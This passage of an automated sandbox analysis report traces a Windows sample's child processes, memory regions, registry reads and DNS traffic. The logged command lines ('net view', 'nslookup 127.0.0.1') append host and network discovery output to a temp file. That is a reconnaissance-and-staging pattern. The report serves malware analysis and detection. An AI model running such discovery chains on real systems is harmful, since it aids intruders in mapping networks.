Create C:\Windows\system32\net.exe os_pid = 0x84, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL True 1
Module (8)
Operation Module Additional Information Success Count
Get Handle c:\windows\system32\cmd.exe base_address = 0x7ff60d9c0000 True 1
Get Handle c:\windows\system32\kernel32.dll base_address = 0x7ff977ab0000 True 2
Get Filename - process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\cmd.exe, size = 260 True 1
Get Address c:\windows\system32\kernel32.dll function = SetThreadUILanguage, address_out = 0x7ff977acd550 True 1
Get Address c:\windows\system32\kernel32.dll function = CopyFileExW, address_out = 0x7ff977ad25e0 True 1
Get Address c:\windows\system32\kernel32.dll function = IsDebuggerPresent, address_out = 0x7ff977ad1f90 True 1
Get Address c:\windows\system32\kernel32.dll function = SetConsoleInputExeNameW, address_out = 0x7ff975423a10 True 1
Environment (19)
Operation Additional Information Success Count
Get Environment String - True 7
Get Environment String name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ True 2
Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 2
Get Environment String name = PROMPT False 1
Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 1
Get Environment String name = KEYS False 1
Set Environment String name = PROMPT, value = $P$G True 1
Set Environment String name = =C:, value = C:\Windows\System32 True 1
Set Environment String name = COPYCMD True 1
Set Environment String name = =ExitCode, value = 00000002 True 1
Set Environment String name = =ExitCodeAscii True 1
Process #27: net.exe
Information Value
ID #27
File Name c:\windows\system32\net.exe
Command Line net view
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:04:23, Reason: Child Process
Unmonitor End Time: 00:04:37, Reason: Terminated by Timeout
Monitor Duration 00:00:14
Remark No high level activity detected in monitored regions
OS Process Information
Information Value
PID 0x84
Parent PID 0x978 (c:\windows\system32\cmd.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username LHNIWSJ\CIiHmnxMn6Ps
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs 0x4BC, 0x4A8
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory r True False False -
private_0x0000003551ed0000 0x3551ed0000 0x3551eeffff Private Memory rw True False False -
pagefile_0x0000003551ed0000 0x3551ed0000 0x3551edffff Pagefile Backed Memory rw True False False -
private_0x0000003551ee0000 0x3551ee0000 0x3551ee6fff Private Memory rw True False False -
pagefile_0x0000003551ef0000 0x3551ef0000 0x3551f03fff Pagefile Backed Memory r True False False -
private_0x0000003551f10000 0x3551f10000 0x3551f8ffff Private Memory rw True False False -
pagefile_0x0000003551f90000 0x3551f90000 0x3551f93fff Pagefile Backed Memory r True False False -
pagefile_0x0000003551fa0000 0x3551fa0000 0x3551fa0fff Pagefile Backed Memory r True False False -
private_0x0000003551fb0000 0x3551fb0000 0x3551fb1fff Private Memory rw True False False -
locale.nls 0x3551fc0000 0x355207dfff Memory Mapped File r False False False -
private_0x0000003552080000 0x3552080000 0x3552086fff Private Memory rw True False False -
netmsg.dll 0x3552090000 0x3552092fff Memory Mapped File rwx False False False -
netmsg.dll.mui 0x35520a0000 0x35520d1fff Memory Mapped File r False False False -
private_0x00000035520e0000 0x35520e0000 0x35521dffff Private Memory rw True False False -
private_0x00000035521e0000 0x35521e0000 0x355225ffff Private Memory rw True False False -
private_0x00000035523c0000 0x35523c0000 0x35523cffff Private Memory rw True False False -
pagefile_0x00007df5ff4a0000 0x7df5ff4a0000 0x7ff5ff49ffff Pagefile Backed Memory - True False False -
pagefile_0x00007ff74e680000 0x7ff74e680000 0x7ff74e77ffff Pagefile Backed Memory r True False False -
pagefile_0x00007ff74e780000 0x7ff74e780000 0x7ff74e7a2fff Pagefile Backed Memory r True False False -
private_0x00007ff74e7a4000 0x7ff74e7a4000 0x7ff74e7a4fff Private Memory rw True False False -
private_0x00007ff74e7ac000 0x7ff74e7ac000 0x7ff74e7adfff Private Memory rw True False False -
private_0x00007ff74e7ae000 0x7ff74e7ae000 0x7ff74e7affff Private Memory rw True False False -
net.exe 0x7ff74ea20000 0x7ff74ea3cfff Memory Mapped File rwx False False False -
cscapi.dll 0x7ff96cc10000 0x7ff96cc21fff Memory Mapped File rwx False False False -
wkscli.dll 0x7ff970e80000 0x7ff970e95fff Memory Mapped File rwx False False False -
samcli.dll 0x7ff9710a0000 0x7ff9710b7fff Memory Mapped File rwx False False False -
winnsi.dll 0x7ff971f40000 0x7ff971f4afff Memory Mapped File rwx False False False -
iphlpapi.dll 0x7ff971f50000 0x7ff971f87fff Memory Mapped File rwx False False False -
browcli.dll 0x7ff972270000 0x7ff972283fff Memory Mapped File rwx False False False -
mpr.dll 0x7ff973b90000 0x7ff973babfff Memory Mapped File rwx False False False -
srvcli.dll 0x7ff973bb0000 0x7ff973bd5fff Memory Mapped File rwx False False False -
netutils.dll 0x7ff973be0000 0x7ff973bebfff Memory Mapped File rwx False False False -
bcrypt.dll 0x7ff9748a0000 0x7ff9748c7fff Memory Mapped File rwx False False False -
kernelbase.dll 0x7ff9753d0000 0x7ff9755acfff Memory Mapped File rwx False False False -
nsi.dll 0x7ff976f70000 0x7ff976f77fff Memory Mapped File rwx False False False -
msvcrt.dll 0x7ff9773c0000 0x7ff97745cfff Memory Mapped File rwx False False False -
sechost.dll 0x7ff9776c0000 0x7ff97771afff Memory Mapped File rwx False False False -
kernel32.dll 0x7ff977ab0000 0x7ff977b5cfff Memory Mapped File rwx False False False -
rpcrt4.dll 0x7ff977df0000 0x7ff977f15fff Memory Mapped File rwx False False False -
ntdll.dll 0x7ff977f30000 0x7ff9780f1fff Memory Mapped File rwx False False False -
Process #29: cmd.exe
62 0
Information Value
ID #29
File Name c:\windows\system32\cmd.exe
Command Line cmd /C "echo -------- >> C:\Users\CIIHMN~1\AppData\Local\Temp\19E9.bin1"
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:04:36, Reason: Child Process
Unmonitor End Time: 00:04:37, Reason: Terminated by Timeout
Monitor Duration 00:00:01
OS Process Information
Information Value
PID 0x86c
Parent PID 0x834 (c:\windows\explorer.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username LHNIWSJ\CIiHmnxMn6Ps
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x53C
0x120
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory r True False False -
private_0x000000b4ee2d0000 0xb4ee2d0000 0xb4ee2effff Private Memory rw True False False -
pagefile_0x000000b4ee2d0000 0xb4ee2d0000 0xb4ee2dffff Pagefile Backed Memory rw True False False -
private_0x000000b4ee2e0000 0xb4ee2e0000 0xb4ee2e6fff Private Memory rw True False False -
pagefile_0x000000b4ee2f0000 0xb4ee2f0000 0xb4ee303fff Pagefile Backed Memory r True False False -
private_0x000000b4ee310000 0xb4ee310000 0xb4ee40ffff Private Memory rw True False False -
pagefile_0x000000b4ee410000 0xb4ee410000 0xb4ee413fff Pagefile Backed Memory r True False False -
pagefile_0x000000b4ee420000 0xb4ee420000 0xb4ee420fff Pagefile Backed Memory r True False False -
private_0x000000b4ee430000 0xb4ee430000 0xb4ee431fff Private Memory rw True False False -
locale.nls 0xb4ee440000 0xb4ee4fdfff Memory Mapped File r False False False -
private_0x000000b4ee500000 0xb4ee500000 0xb4ee506fff Private Memory rw True False False -
private_0x000000b4ee550000 0xb4ee550000 0xb4ee64ffff Private Memory rw True False False -
private_0x000000b4ee650000 0xb4ee650000 0xb4ee74ffff Private Memory rw True False False -
private_0x000000b4ee860000 0xb4ee860000 0xb4ee86ffff Private Memory rw True False False -
pagefile_0x00007df5fff70000 0x7df5fff70000 0x7ff5fff6ffff Pagefile Backed Memory - True False False -
pagefile_0x00007ff60d650000 0x7ff60d650000 0x7ff60d74ffff Pagefile Backed Memory r True False False -
pagefile_0x00007ff60d750000 0x7ff60d750000 0x7ff60d772fff Pagefile Backed Memory r True False False -
private_0x00007ff60d778000 0x7ff60d778000 0x7ff60d778fff Private Memory rw True False False -
private_0x00007ff60d77c000 0x7ff60d77c000 0x7ff60d77dfff Private Memory rw True False False -
private_0x00007ff60d77e000 0x7ff60d77e000 0x7ff60d77ffff Private Memory rw True False False -
cmd.exe 0x7ff60d9c0000 0x7ff60da18fff Memory Mapped File rwx True False False -
kernelbase.dll 0x7ff9753d0000 0x7ff9755acfff Memory Mapped File rwx False False False -
msvcrt.dll 0x7ff9773c0000 0x7ff97745cfff Memory Mapped File rwx False False False -
kernel32.dll 0x7ff977ab0000 0x7ff977b5cfff Memory Mapped File rwx False False False -
ntdll.dll 0x7ff977f30000 0x7ff9780f1fff Memory Mapped File rwx False False False -
Host Behavior
File (24)
Operation Filename Additional Information Success Count Logfile
Create C:\Users\CIIHMN~1\AppData\Local\Temp\19E9.bin1 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Get Info C:\Windows\system32 type = file_attributes True 1
Fn
Get Info C:\Windows\System32 type = file_attributes True 1
Fn
Get Info STD_OUTPUT_HANDLE type = file_type True 1
Fn
Get Info STD_OUTPUT_HANDLE type = file_type True 2
Fn
Get Info STD_OUTPUT_HANDLE type = size True 1
Fn
Open STD_OUTPUT_HANDLE - True 12
Fn
Open STD_INPUT_HANDLE - True 3
Fn
Read STD_OUTPUT_HANDLE size = 1, size_out = 1 True 1
Fn
Data
Write STD_OUTPUT_HANDLE size = 11 True 1
Fn
Data
Registry (17)
Operation Key Additional Information Success Count Logfile
Open Key HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Command Processor - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = AutoRun, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = AutoRun, data = 9, type = REG_NONE False 1
Fn
Module (8)
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\system32\cmd.exe base_address = 0x7ff60d9c0000 True 1
Fn
Get Handle c:\windows\system32\kernel32.dll base_address = 0x7ff977ab0000 True 2
Fn
Get Filename - process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\cmd.exe, size = 260 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = SetThreadUILanguage, address_out = 0x7ff977acd550 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = CopyFileExW, address_out = 0x7ff977ad25e0 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = IsDebuggerPresent, address_out = 0x7ff977ad1f90 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = SetConsoleInputExeNameW, address_out = 0x7ff975423a10 True 1
Fn
Environment (11)
Operation Additional Information Success Count Logfile
Get Environment String - True 4
Fn
Data
Get Environment String name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ True 1
Fn
Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 1
Fn
Get Environment String name = PROMPT False 1
Fn
Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 1
Fn
Get Environment String name = KEYS False 1
Fn
Set Environment String name = PROMPT, value = $P$G True 1
Fn
Set Environment String name = =C:, value = C:\Windows\System32 True 1
Fn
Process #31: cmd.exe
67 0
Information Value
ID #31
File Name c:\windows\system32\cmd.exe
Command Line cmd /C "nslookup 127.0.0.1 >> C:\Users\CIIHMN~1\AppData\Local\Temp\19E9.bin1"
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:04:36, Reason: Child Process
Unmonitor End Time: 00:04:37, Reason: Terminated by Timeout
Monitor Duration 00:00:01
OS Process Information
Information Value
PID 0x420
Parent PID 0x834 (c:\windows\explorer.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username LHNIWSJ\CIiHmnxMn6Ps
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x3A0
0xAF8
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory r True False False -
private_0x000000a1b5800000 0xa1b5800000 0xa1b581ffff Private Memory rw True False False -
pagefile_0x000000a1b5800000 0xa1b5800000 0xa1b580ffff Pagefile Backed Memory rw True False False -
private_0x000000a1b5810000 0xa1b5810000 0xa1b5816fff Private Memory rw True False False -
pagefile_0x000000a1b5820000 0xa1b5820000 0xa1b5833fff Pagefile Backed Memory r True False False -
private_0x000000a1b5840000 0xa1b5840000 0xa1b593ffff Private Memory rw True False False -
pagefile_0x000000a1b5940000 0xa1b5940000 0xa1b5943fff Pagefile Backed Memory r True False False -
pagefile_0x000000a1b5950000 0xa1b5950000 0xa1b5950fff Pagefile Backed Memory r True False False -
private_0x000000a1b5960000 0xa1b5960000 0xa1b5961fff Private Memory rw True False False -
locale.nls 0xa1b5970000 0xa1b5a2dfff Memory Mapped File r False False False -
private_0x000000a1b5a30000 0xa1b5a30000 0xa1b5a36fff Private Memory rw True False False -
private_0x000000a1b5aa0000 0xa1b5aa0000 0xa1b5b9ffff Private Memory rw True False False -
private_0x000000a1b5ba0000 0xa1b5ba0000 0xa1b5c9ffff Private Memory rw True False False -
private_0x000000a1b5df0000 0xa1b5df0000 0xa1b5dfffff Private Memory rw True False False -
sortdefault.nls 0xa1b5e00000 0xa1b6136fff Memory Mapped File r False False False -
pagefile_0x00007df5ff0b0000 0x7df5ff0b0000 0x7ff5ff0affff Pagefile Backed Memory - True False False -
pagefile_0x00007ff60d6d0000 0x7ff60d6d0000 0x7ff60d7cffff Pagefile Backed Memory r True False False -
pagefile_0x00007ff60d7d0000 0x7ff60d7d0000 0x7ff60d7f2fff Pagefile Backed Memory r True False False -
private_0x00007ff60d7fa000 0x7ff60d7fa000 0x7ff60d7fbfff Private Memory rw True False False -
private_0x00007ff60d7fc000 0x7ff60d7fc000 0x7ff60d7fdfff Private Memory rw True False False -
private_0x00007ff60d7fe000 0x7ff60d7fe000 0x7ff60d7fefff Private Memory rw True False False -
cmd.exe 0x7ff60d9c0000 0x7ff60da18fff Memory Mapped File rwx True False False -
kernelbase.dll 0x7ff9753d0000 0x7ff9755acfff Memory Mapped File rwx False False False -
msvcrt.dll 0x7ff9773c0000 0x7ff97745cfff Memory Mapped File rwx False False False -
kernel32.dll 0x7ff977ab0000 0x7ff977b5cfff Memory Mapped File rwx False False False -
ntdll.dll 0x7ff977f30000 0x7ff9780f1fff Memory Mapped File rwx False False False -
Host Behavior
File (20)
Operation Filename Additional Information Success Count Logfile
Create C:\Users\CIIHMN~1\AppData\Local\Temp\19E9.bin1 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Get Info C:\Windows\system32 type = file_attributes True 1
Fn
Get Info C:\Windows\System32 type = file_attributes True 1
Fn
Get Info STD_OUTPUT_HANDLE type = file_type True 1
Fn
Get Info STD_OUTPUT_HANDLE type = file_type True 1
Fn
Get Info STD_OUTPUT_HANDLE type = size True 1
Fn
Open STD_OUTPUT_HANDLE - True 10
Fn
Open STD_INPUT_HANDLE - True 3
Fn
Read STD_OUTPUT_HANDLE size = 1, size_out = 1 True 1
Fn
Data
Registry (17)
Operation Key Additional Information Success Count Logfile
Open Key HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Command Processor - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = AutoRun, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = AutoRun, data = 9, type = REG_NONE False 1
Fn
Process (1)
Operation Process Additional Information Success Count Logfile
Create C:\Windows\system32\nslookup.exe os_pid = 0x114, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL True 1
Fn
Module (8)
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\system32\cmd.exe base_address = 0x7ff60d9c0000 True 1
Fn
Get Handle c:\windows\system32\kernel32.dll base_address = 0x7ff977ab0000 True 2
Fn
Get Filename - process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\cmd.exe, size = 260 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = SetThreadUILanguage, address_out = 0x7ff977acd550 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = CopyFileExW, address_out = 0x7ff977ad25e0 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = IsDebuggerPresent, address_out = 0x7ff977ad1f90 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = SetConsoleInputExeNameW, address_out = 0x7ff975423a10 True 1
Fn
Environment (19)
Operation Additional Information Success Count Logfile
Get Environment String - True 7
Fn
Data
Get Environment String name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ True 2
Fn
Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 2
Fn
Get Environment String name = PROMPT False 1
Fn
Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 1
Fn
Get Environment String name = KEYS False 1
Fn
Set Environment String name = PROMPT, value = $P$G True 1
Fn
Set Environment String name = =C:, value = C:\Windows\System32 True 1
Fn
Set Environment String name = COPYCMD True 1
Fn
Set Environment String name = =ExitCode, value = 00000000 True 1
Fn
Set Environment String name = =ExitCodeAscii True 1
Fn
Process #33: nslookup.exe
8 11
Information Value
ID #33
File Name c:\windows\system32\nslookup.exe
Command Line nslookup 127.0.0.1
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:04:36, Reason: Child Process
Unmonitor End Time: 00:04:37, Reason: Terminated by Timeout
Monitor Duration 00:00:01
OS Process Information
Information Value
PID 0x114
Parent PID 0x420 (c:\windows\system32\cmd.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username LHNIWSJ\CIiHmnxMn6Ps
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x510
0x794
0x954
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory r True False False -
private_0x000000ee681f0000 0xee681f0000 0xee6820ffff Private Memory rw True False False -
pagefile_0x000000ee681f0000 0xee681f0000 0xee681fffff Pagefile Backed Memory rw True False False -
private_0x000000ee68200000 0xee68200000 0xee68206fff Private Memory rw True False False -
pagefile_0x000000ee68210000 0xee68210000 0xee68223fff Pagefile Backed Memory r True False False -
private_0x000000ee68230000 0xee68230000 0xee682affff Private Memory rw True False False -
pagefile_0x000000ee682b0000 0xee682b0000 0xee682b3fff Pagefile Backed Memory r True False False -
pagefile_0x000000ee682c0000 0xee682c0000 0xee682c0fff Pagefile Backed Memory r True False False -
private_0x000000ee682d0000 0xee682d0000 0xee682d1fff Private Memory rw True False False -
locale.nls 0xee682e0000 0xee6839dfff Memory Mapped File r False False False -
private_0x000000ee683a0000 0xee683a0000 0xee6841ffff Private Memory rw True False False -
private_0x000000ee68420000 0xee68420000 0xee68426fff Private Memory rw True False False -
imm32.dll 0xee68430000 0xee68463fff Memory Mapped File r False False False -
nslookup.exe.mui 0xee68430000 0xee68434fff Memory Mapped File r False False False -
private_0x000000ee68440000 0xee68440000 0xee68440fff Private Memory rw True False False -
private_0x000000ee68450000 0xee68450000 0xee68450fff Private Memory rw True False False -
private_0x000000ee68470000 0xee68470000 0xee6856ffff Private Memory rw True False False -
private_0x000000ee68630000 0xee68630000 0xee6863ffff Private Memory rw True False False -
pagefile_0x000000ee68640000 0xee68640000 0xee687c7fff Pagefile Backed Memory r True False False -
pagefile_0x000000ee687d0000 0xee687d0000 0xee68950fff Pagefile Backed Memory r True False False -
pagefile_0x000000ee68960000 0xee68960000 0xee69d5ffff Pagefile Backed Memory r True False False -
pagefile_0x00007df5ffed0000 0x7df5ffed0000 0x7ff5ffecffff Pagefile Backed Memory - True False False -
pagefile_0x00007ff61dfe0000 0x7ff61dfe0000 0x7ff61e0dffff Pagefile Backed Memory r True False False -
pagefile_0x00007ff61e0e0000 0x7ff61e0e0000 0x7ff61e102fff Pagefile Backed Memory r True False False -
private_0x00007ff61e10b000 0x7ff61e10b000 0x7ff61e10cfff Private Memory rw True False False -
private_0x00007ff61e10d000 0x7ff61e10d000 0x7ff61e10efff Private Memory rw True False False -
private_0x00007ff61e10f000 0x7ff61e10f000 0x7ff61e10ffff Private Memory rw True False False -
nslookup.exe 0x7ff61e670000 0x7ff61e68afff Memory Mapped File rwx True False False -
napinsp.dll 0x7ff96aec0000 0x7ff96aed4fff Memory Mapped File rwx False False False -
pnrpnsp.dll 0x7ff96b3a0000 0x7ff96b3b9fff Memory Mapped File rwx False False False -
winrnr.dll 0x7ff96c110000 0x7ff96c11cfff Memory Mapped File rwx False False False -
dhcpcsvc.dll 0x7ff96f5b0000 0x7ff96f5c9fff Memory Mapped File rwx False False False -
dhcpcsvc6.dll 0x7ff96f5d0000 0x7ff96f5e5fff Memory Mapped File rwx False False False -
winnsi.dll 0x7ff971f40000 0x7ff971f4afff Memory Mapped File rwx False False False -
iphlpapi.dll 0x7ff971f50000 0x7ff971f87fff Memory Mapped File rwx False False False -
nlaapi.dll 0x7ff9727e0000 0x7ff9727f7fff Memory Mapped File rwx False False False -
dnsapi.dll 0x7ff973f10000 0x7ff973fb7fff Memory Mapped File rwx False False False -
mswsock.dll 0x7ff974170000 0x7ff9741ccfff Memory Mapped File rwx False False False -
kernelbase.dll 0x7ff9753d0000 0x7ff9755acfff Memory Mapped File rwx False False False -
user32.dll 0x7ff9757b0000 0x7ff9758fdfff Memory Mapped File rwx False False False -
nsi.dll 0x7ff976f70000 0x7ff976f77fff Memory Mapped File rwx False False False -
msctf.dll 0x7ff977200000 0x7ff97735bfff Memory Mapped File rwx False False False -
msvcrt.dll 0x7ff9773c0000 0x7ff97745cfff Memory Mapped File rwx False False False -
gdi32.dll 0x7ff9774c0000 0x7ff977644fff Memory Mapped File rwx False False False -
sechost.dll 0x7ff9776c0000 0x7ff97771afff Memory Mapped File rwx False False False -
imm32.dll 0x7ff977720000 0x7ff977755fff Memory Mapped File rwx False False False -
kernel32.dll 0x7ff977ab0000 0x7ff977b5cfff Memory Mapped File rwx False False False -
ws2_32.dll 0x7ff977cb0000 0x7ff977d18fff Memory Mapped File rwx False False False -
rpcrt4.dll 0x7ff977df0000 0x7ff977f15fff Memory Mapped File rwx False False False -
ntdll.dll 0x7ff977f30000 0x7ff9780f1fff Memory Mapped File rwx False False False -
Host Behavior
Registry (7)
Operation Key Additional Information Success Count Logfile
Open Key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DNSClient - False 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters value_name = DNSLookupOrder False 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters value_name = Domain True 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters value_name = DhcpDomain False 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters value_name = SearchList False 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters value_name = DhcpSearchList False 1
Fn
Module (1)
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\system32\nslookup.exe base_address = 0x7ff61e670000 True 1
Fn
Network Behavior
DNS (1)
Operation Additional Information Success Count Logfile
Get Hostname name_out = LHnIwsj True 1
Fn
UDP Sessions (2)
Information Value
Total Data Sent 82 bytes
Total Data Received 105 bytes
Contacted Host Count 1
Contacted Hosts 192.168.0.1:53
UDP Session #1
Information Value
Handle 0x148
Address Family AF_INET
Type SOCK_DGRAM
Protocol IPPROTO_IP
Remote Address 192.168.0.1
Remote Port 53
Local Address 0.0.0.0
Local Port 54873
Data Sent 42 bytes
Data Received 42 bytes
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Connect remote_address = 192.168.0.1, remote_port = 53 True 1
Fn
Send flags = NO_FLAG_SET, size = 42, size_out = 42 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 65536, size_out = 42 True 1
Fn
Data
Close type = SOCK_DGRAM True 1
Fn
UDP Session #2
Information Value
Handle 0x148
Address Family AF_INET
Type SOCK_DGRAM
Protocol IPPROTO_IP
Remote Address 192.168.0.1
Remote Port 53
Local Address 0.0.0.0
Local Port 54873
Data Sent 40 bytes
Data Received 63 bytes
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Connect remote_address = 192.168.0.1, remote_port = 53 True 1
Fn
Send flags = NO_FLAG_SET, size = 40, size_out = 40 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 65536, size_out = 63 True 1
Fn
Data
Close type = SOCK_DGRAM True 1
Fn
Process #34: cmd.exe
0 0
Information Value
ID #34
File Name c:\windows\system32\cmd.exe
